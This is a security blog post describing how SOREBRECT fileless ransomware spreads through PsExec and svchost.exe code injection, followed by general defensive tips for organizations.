Attackers are constantly looking for new ways to evade detection. While new forms of cybercrime are on the rise, traditional activities seem to be shifting towards more illegitimate techniques that come with limitless attack vectors with low detection rates. New malware techniques take advantage of operating system features to inject malicious code into memory or the operating system registry without leaving a file on the disk.
Security researches firstly encountered SOREBRECT during their monitoring in this early year, affecting the systems and networks of organizations in the Middle East. Extracting and analysing the SOREBRECT samples revealed the unusual techniques it employs to encrypt its victim’s data. Unlike traditional ransomware, SOREBRECT has been designed to target enterprise's servers and endpoint. These attacks are known as fileless or non-malware ransomware and it leverages Microsoft’s PowerShell’s scripting language to target organizations through documents and/or applications that run through macros.
The experts noticed that the SOREBRECT fileless ransomware first compromises administrator credentials (i.e. by brute forcing attacks), then leverage Microsoft Sysinternals PsExec command-line utility to encrypt files. PsExec can enable attackers to run remotely executed commands, instead of providing and using an entire interactive login session, or manually transferring the malware into a remote machine, like in RDPs.
SOREBRECT takes this a notch further by maliciously deploying PsExec and performing code injection. It injects its code into Windows’ svchost.exe process, while the main binary self-destructs. The combination is potent: once the deployed ransomware binary finishes execution and self-termination, the injected svchost.exe—a legitimate Windows service-hosting system process—resumes the execution of the payload (file encryption). Because SOREBRECT becomes fileless after code injection, sourcing its binary sample at the endpoint level is challenging.
SOREBRECT can also scramble the files of other computers connected to the infected machine through the local network. It does so by scanning the network for asset discovery and enumerating open shares—folders, content or peripherals (i.e. printers) that others can readily access through the network.
How does Fileless Ransomware Work with PowerShell?
Non-malware aka fileless ransomware (unlike traditional ransomware) does not use files to encrypt your data; instead it writes scripts/macros which derive from PowerShell to encrypt the files.
What are the two ways fileless ransomware can penetrate your systems?
Via Phishing Attacks: An email is opened on a device and automatically writes macros directly to your device’s (i.e. tablet, laptop, cellphone or desktop) memory which starts dictating commands of payment as well as encrypting your data.
Via Compromised Websites: An employee browses or visits a compromised/malicious website in which the cyber criminals write scripts to the computer’s RAM to capture some pertinent information which will then either ask for cryptocurrency or immediately encrypt your files.
Why is fileless ransomware unique?
Fileless malware is unique and difficult to detect because the malicious code is embedded into a native scripting language or written straight into the computer’s RAM, where it hides in isolated spots within the computer’s memory. It’s not written to disk nor does the malicious code rely on the hard drive to run these commands.
What are the problems associated with Fileless Ransomware?
- Fileless ransomware leaves little trace behind nor can it be detected with any antivirus software.
- This ransomware strain allows cyber criminals to have access to your systems, meaning that they can infiltrate your computers, steal your information and encrypt your files without your IT staff even knowing.
- It can lead to more attacks. As the cyber criminals are writing scripts they’re also gathering as much data from the victim’s computer as possible.
Since the ransomware does not target individuals but organizations, sysadmins and information security professionals can protect themselves by:
- BACKUP YOUR DATA
- BLOCK ALL INFECTED EMAILS, PAGES & COMMUNICATION WITH BROWSERS AND SERVERS.
- UPDATE YOUR SYSTEM
- RESTRICT USER WRITE PERMISSIONS
- BE VIGILANT
- FOSTER A CYBER SECURITY AWARENESS SESSIONS
Humans are often the weakest defensive link, and this type of attack relies heavily on that vulnerability.
No comments:
Post a Comment